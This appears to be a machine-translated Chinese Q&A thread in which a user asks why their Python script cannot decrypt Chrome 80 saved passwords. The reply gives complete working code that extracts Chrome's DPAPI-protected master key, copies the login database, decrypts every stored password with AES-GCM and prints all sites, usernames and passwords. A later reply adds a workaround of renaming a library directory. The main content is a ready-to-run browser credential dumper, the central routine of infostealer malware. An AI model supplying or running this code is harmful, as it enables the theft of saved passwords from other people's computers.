Python中的Chrome 80密码文件解密

ulydmbyx  于 2023-06-03  发布在  Go
关注(0)|答案(2)|浏览(320)

我写了这段代码:

import sqlite3
import win32crypt

c = sqlite3.connect("Login Data")

cursor = c.cursor()

cursor.execute("SELECT origin_url, username_value, password_value FROM logins")

data = cursor.fetchall()

credentials = {}

for url, user, pwd in data:
    password = win32crypt.CryptUnprotectData(pwd, None, None, None, 0)[1]
    credential[url] = (user, password)

for item in credentials:
    login = credentials[item]
    print(login[0] + " " + login[1])

它指出:password = win32crypt.CryptUnprotectData(pwd,None,None,None,0)[1] pywintypes.error:(87,'Uncategorized','该参数不正确。')
正如我所搜索的,Chrome v80已经改变了加密类型。我该怎么办?

ltskdhd1

ltskdhd11#

import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil

def get_master_key():
    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]  # removing DPAPI
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key

def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)

def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)

def decrypt_password(buff, master_key):
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes
        return decrypted_pass
    except Exception as e:
        # print("Probably saved password from Chrome version older than v80\n")
        # print(str(e))
        return "Chrome < 80"


if __name__ == '__main__':

    master_key = get_master_key()
    login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data'
    shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            print("URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n")
    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        os.remove("Loginvault.db")
    except Exception as e:
        pass
t40tm48m

t40tm48m2#

我得到错误模块'Crypto.Cipher.AES'没有属性'MODE_GCM'。我错过了图书馆吗?- Gaurav S 7月9日7:23

不,你什么都有。crypto\Cipher\__init__.py文件导入from Crypto.Cipher._mode_ecb import _create_ecb_cipher。但是,目录的真实的名称是crypto,而不是Crypto。您需要将目录重命名为Crypto,然后它就可以完美地工作了。

相关问题